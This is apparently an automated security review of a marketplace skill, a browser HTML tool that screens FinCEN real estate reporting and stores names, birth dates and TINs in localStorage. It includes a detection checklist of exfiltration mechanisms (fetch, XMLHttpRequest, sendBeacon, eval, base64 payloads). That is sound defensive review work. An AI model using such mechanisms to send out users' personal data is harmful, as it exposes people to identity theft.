Skillv1.0.0

ClawScan security

Compliance Guardian · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

SuspiciousApr 4, 2026, 5:52 PM

Verdict: suspicious
Confidence: medium
Model: gpt-5-mini
Summary: The skill's functionality (a browser HTML tool to screen FinCEN reporting and store filing data) is coherent with its description, but it collects sensitive PII/TIN data in the browser and the provided HTML was truncated in the review, leaving possible hidden network behavior unverified—exercise caution and inspect the full file before use.
Guidance: This tool appears to be a straightforward browser-based FinCEN reporting helper, and it does not request external credentials or installation. However: - The form collects very sensitive PII (names, DOBs, addresses, TIN/SSNs). Only enter such data if you trust where the file is served from and you understand how it will be stored and who can access it. localStorage is unencrypted and persists on the browser profile. - Before using or deploying, open the full compliance-guardian.html in a text editor and search for any network activity or obfuscated code: look for fetch(), XMLHttpRequest, navigator.sendBeacon, WebSocket, <script src=>, <img src=>, eval(), atob()/btoa(), long base64 strings, or remote URLs. If any are present, confirm their purpose and destination. - If you plan to host it with your Mission Control instance, serve it from a trusted, HTTPS origin and confirm the origin does not add third-party scripts that could read localStorage. - Consider avoiding entry of SSNs/TINs into this tool if you cannot guarantee local-only storage. If you must store highly sensitive fields, use a version enhanced for secure storage (encrypted storage, server-side vaulting) or remove those fields from local persistence. - Because the provided HTML in the review was truncated, I have medium confidence in this assessment. If you provide the complete compliance-guardian.html (full source), I can re-scan it for hidden network requests, obfuscation, or other red flags and raise the confidence of this verdict.

Review Dimensions

Purpose & Capability: okName/description match the delivered assets: an instruction-only skill with a single HTML file that implements a screener, form pre-filler, and deadline tracker for FinCEN residential real estate reporting. Nothing requested (no env vars, no binaries, no install) is out of scope for that purpose.
Instruction Scope: noteSKILL.md instructs the user to download/open the single HTML file and optionally add a Mission Control navigation button; the HTML (what was visible) implements UI and saves data to browser localStorage only. This scope is appropriate for a browser-based helper, but the skill collects highly sensitive fields (names, DOB, addresses, TIN/SSN). The instructions do not describe any external transmission, but the HTML file in the prompt was truncated — the remainder may include network calls or telemetry. Verify the full file for any fetch/XHR, <img>, <script src=>, navigator.sendBeacon, eval/obfuscated code, or base64-encoded payloads before use.
Install Mechanism: okNo install spec and no binaries requested; runtime is purely a local HTML file opened in a browser. This is minimal and proportionate.
Credentials: okThe skill declares no required environment variables or external credentials. That aligns with the stated purpose. However, the tool requests collection of personal identifying information (including TIN/SSN) through its UI; while expected for the task, this raises data-sensitivity concerns rather than mismatched credential requests.
Persistence & Privilege: noteThe tool persists entries in browser localStorage (per SKILL.md and visible HTML). This is expected for a client-side tracker, but localStorage is unencrypted and accessible to other scripts served from the same origin. Adding the file to Mission Control or serving it from a shared host could expose stored PII to the host origin. The skill is not marked always:true and does not require elevated agent privileges.